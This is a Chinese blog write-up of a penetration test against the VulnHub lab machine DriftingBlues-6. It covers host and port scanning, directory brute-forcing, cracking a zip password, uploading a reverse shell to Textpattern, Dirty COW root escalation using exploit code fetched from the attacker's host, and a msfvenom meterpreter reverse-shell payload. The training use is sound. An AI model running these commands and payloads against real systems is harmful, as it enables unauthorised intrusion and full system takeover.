vulnhub靶机:driftingblues-6

最新推荐文章于 2026-01-06 13:45:00 发布
原创 最新推荐文章于 2026-01-06 13:45:00 发布 · 874 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux

文章描述了一次针对10.9.23.54的黑客渗透测试过程,包括使用ARP扫描、端口扫描、检测内核漏洞、目录探测、暴力破解、文件上传、提权利用脏牛漏洞以及最终生成并上传木马的过程。

一:主机发现

arp-scan -I eth0 10.9.23.0/24

二:端口扫描

nmap -T4 -sV -p- -A 10.9.23.54

内核3.2可能存在脏牛漏洞

三:目录探测

dirb http://10.9.23.54

http://10.9.23.54/robots.txt

10.9.23.54/textpattern/textpattern

add .zip extension to your dir-brute

http://10.9.23.54/textpattern/

dirb http://10.4.7.54 -X .txt,.php,.html,.bak,.md,.zip

gobuster dir -u http://10.9.23.54/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip

根据robots.txt下的提示,搜索.zip后缀的目录
/spammer.zip发现这个压缩包,下载解压发现需要密码

wget http://10.9.23.54/spammer.zip

发现有密码,暴力破解一下:

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u spammer.zip

得到密码

myspace4

得到用户名和密码

mayer:lionheart

四:渗透测试

http://10.9.23.54/textpattern/

发现有文件上传的地方并且知道了文件上传后的位置,尝试上传个 反弹 shell:

http://10.9.23.54/textpattern/files

反弹成功

五:提权

1.用python回弹交互式shell,find命令也没有可以利用的信息

python -c "import pty;pty.spawn('/bin/bash')"

find / -perm -u=s -type f 2>/dev/null

因为之前发现存在脏牛漏洞

2.uname -a查看靶机内核版本

3.searchsploit kernel 3.2 发现脏牛漏洞

4.python3 -m http.server 80

5:进入tmp目录下,将dirty.c下载下来

wget http://10.9.23.112/dirty.c

6.按照脚本给出的步骤操作

chmod 777 dirty.c

gcc -pthread dirty.c -o dirty -lcrypt

执行

./dirty

后面接密码root

su firefart

靶机结束

2:msfvenom生成木马,文件上传
命令: msfvenom -p php/meterpreter/reverse_tcp LHOST=10.9.23.54 LPORT=4444 -f raw > shell1.php
上传后。

msf模块设置payload:
命令:
set payload php/meterpreter/reverse_tcp
set lhost 10.9.23.112
run

不言君
关注
[Vulnhub靶机] DriftingBlues: 5
网安日记本的博客
02-13 2302
[Vulnhub靶机] DriftingBlues: 5靶机渗透思路及方法(个人分享)
Vulnhub靶机driftingblues 6
qq_48904485的博客
01-16 542
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机driftingblues6(10.0.2.22)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/driftingblues-6,672/
[Vulnhub靶机] DriftingBlues: 7
网安日记本的博客
02-16 1699
[Vulnhub靶机] DriftingBlues: 7靶机渗透思路及方法(个人分享)
Vulnhub靶机driftingblues 9
qq_48904485的博客
01-20 968
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机driftingblues9(10.0.2.24)目标:获取靶机root权限和flag靶机下载地址:http://www.vulnhub.com/entry/driftingblues-9-final,695/
[Vulnhub靶机] DriftingBlues: 1
网安日记本的博客
02-02 2287
[Vulnhub靶机] DriftingBlues: 1靶机渗透思路及方法(个人分享)
Vulnhub靶机driftingblues 7
qq_48904485的博客
01-19 521
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机driftingblues7(10.0.2.23)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/
Vulnhub--DriftingBlues-1靶机通关详解
m0_72634167的博客
03-21 2260
1.自动任务提权的思路2.gobuster工具爆破子域名3.crunch生成密码列表的命令行工具的使用。
Vulnhub--DriftingBlues-2靶机通关详解
m0_72634167的博客
03-28 1547
1.图片隐写的认知2.wpsacn工具的使用3.ssh公私钥的认知4.nmap文件的提权方式。
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3
Aluxian_的博客
06-15 1882
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。官网地址: https://www.vulnhub.com/entry/driftingblues-3,656/下载好了把安装包解压 然后试用VMware即可。 前言:这里又是DriftingBlues-2的问题 需要自己配网卡 具体参考:
Nmap 完整教学与 Linux 指令详解
2401_84359179的博客
01-03 1645
总结:Nmap 是网络安全领域的"瑞士军刀",掌握 `-sS`、`-sV`、`-O`、`-A`、`-p`、`-T`、 `--script` 这 7 大核心参数,即可应对 90% 的扫描场景。1.权限 :SYN 扫描 (`-sS`)、OS 检测 (`-O`)、UDP 扫描 (`-sU`) 需要 root 权限。3. 防火墙:现代 IDS/IPS 能检测 Nmap 扫描特征,需配合 `-T2`、`-f`、`-D` 等规避。初学者 :从 `-sT`、`-sV`、`-p` 开始,逐步学习高级选项。
Linux-Web服务(Apache)
Maggie_ssss_supp的博客
01-05 362
Apache HTTP Server(简称Apache)是Apache软件基金会的一个开源的web服务器,Apache是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。1.主配置目录:/etc/httpd/conf/2.子配置目录:/etc/httpd/conf.d/2.默认发布目录:/var/www/html/3.默认监听端口:804.检查是否有语法问题:httpd -t。
Linux磁盘占用分析指南
哈喽。
01-06 289
Linux磁盘占用分析指南摘要 本文全面介绍了Linux系统中分析磁盘占用的多种方法。基础命令包括du(显示目录大小)和df(显示文件系统使用情况),配合-h参数可人性化显示。高级工具推荐ncdu(交互式分析)和gt5(历史对比)。文章提供了实用脚本:查找大文件、目录分析报告和磁盘监控脚本,并介绍了可视化工具filelight和baobab。最佳实践建议定期清理、监控使用率、压缩归档大文件。常见问题解决方案包括处理已删除但未释放的文件和权限问题。通过合理组合这些工具,可高效管理Linux磁盘空间。
LINUX modprobe 智能加载和卸载内核模块
最新发布
xingzhemengyou1的博客
01-06 368
摘要:modprobe是Linux系统中智能管理内核模块的核心命令,能自动处理模块依赖关系。它通过读取depmod生成的modules.dep文件,实现模块的智能加载/卸载,失败时自动回滚。常用参数包括-r卸载、v显示详情、c查看配置等。相比insmod/rmmod等低级命令,modprobe更安全高效。系统通过/etc/modprobe.d/配置模块参数,使用时应避免强制操作。该命令是Linux模块管理的首选工具。
Linux 文件系统一致性: 从崩溃恢复到 Journaling 机制
X
01-06 301
文件系统一致性指的是磁盘上的数据结构和内存中的视图保持同步, 满足特定的不变式(invariants). 简单理解就是: 无论何时中断, 文件系统都能恢复到一个合法的状态inode 位图(标记该 inode 为空闲)数据块位图(标记数据块为空闲)父目录项(删除目录条目)如果只完成了其中一两步就掉电, 文件系统就进入了不一致状态: 可能 inode 仍被标记为占用, 但对应的数据块已被清空, 导致垃圾文件占据磁盘空间维度挑战解决方案可靠性掉电/崩溃导致数据不一致。
Linux: network: ipv6: proxy_ndp
mzhan017的博客
01-04 170
这意味着,如果一个主机 A 询问主机 B 的 MAC 地址,而主机 B 不在主机 A 的直接链路上,但有一个启用了 proxy_ndp 的中间设备 C 知道主机 B 的 MAC 地址,那么设备 C 就会代表主机 B 回复主机 A 的请求。桥接 (Bridging):在某些复杂的桥接或虚拟化环境中,如果一个设备(如路由器或主机)需要为连接到其上的其他设备(如虚拟机或物理服务器)代理 NDP 消息,以确保它们能够被网络中的其他节点发现。将其值设置为 1 启用,设置为 0 禁用。
linux的ext家族的文件系中,inode是也存放在block中的
cici_new_1987的专栏
01-02 283
ext 文件系统会将磁盘空间划分为多个固定大小的块(如 1KB、4KB),并从这些块中专门分配一部分连续区域作为「inode 表」(inode table),每个 inode 占据固定大小的存储空间(通常为 128 字节或 256 字节,具体取决于文件系统配置),而整个 inode 表本身就存储在一个或多个连续的磁盘块中。例如,如果一个文件的大小为1K,而块的大小为4K,那么该文件还是会占用一个块,块中剩下的3K被空闲出来,不能用于存储其他数据。因此,设置块的大小时,需要考虑要存储文件的大小。
整理一些Linux的常用命令
qq_44678890的博客
01-03 130
麒麟操作系统 | 文件与目录的权限
yangbao888的博客
01-05 532
摘要:本文系统介绍了麒麟操作系统中文件与目录权限管理的核心知识。主要内容包括:1)文件权限查看(ls -la)及字符/数字表示方法;2)权限修改命令(chmod、chown、chgrp)的使用;3)特殊权限(SUID、SGID、SBIT)的功能与应用场景;4)隐藏权限(chattr、lsattr)的设置与查看;5)ACL权限(setfacl、getfacl)的高级访问控制。文章通过实例详细说明了各种权限管理技巧,为系统管理员提供了全面的权限配置指南。(149字)
如何排查 Linux 系统服务器的性能故障问题:使用 `top`、`htop`、`iostat` 等工具
A5互联
12-31 766
在日常运维工作中,Linux服务器性能故障是最常见也是最耗时间的问题之一。一次跨境电商促销高峰,我遇到一台香港服务器在流量高峰时段 CPU 利用率暴涨、I/O 等待严重、响应变慢,客户订单提交延迟甚至失败。通过系统化使用 top、htop、iostat 等工具,我最终定位到瓶颈是磁盘 I/O 饱和 + 单个进程异常消耗导致的。
Vulnhub靶机渗透实战:JIS-CTF入门与提权详解
Vulnhub靶机渗透教程是一套面向网络安全初学者的系统性实践指南,旨在通过真实模拟漏洞环境帮助学习者掌握Web渗透测试的核心技能。该教程以“JIS-CTF”这一经典入门级靶机为实战对象,全面涵盖了从环境搭建到最终...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值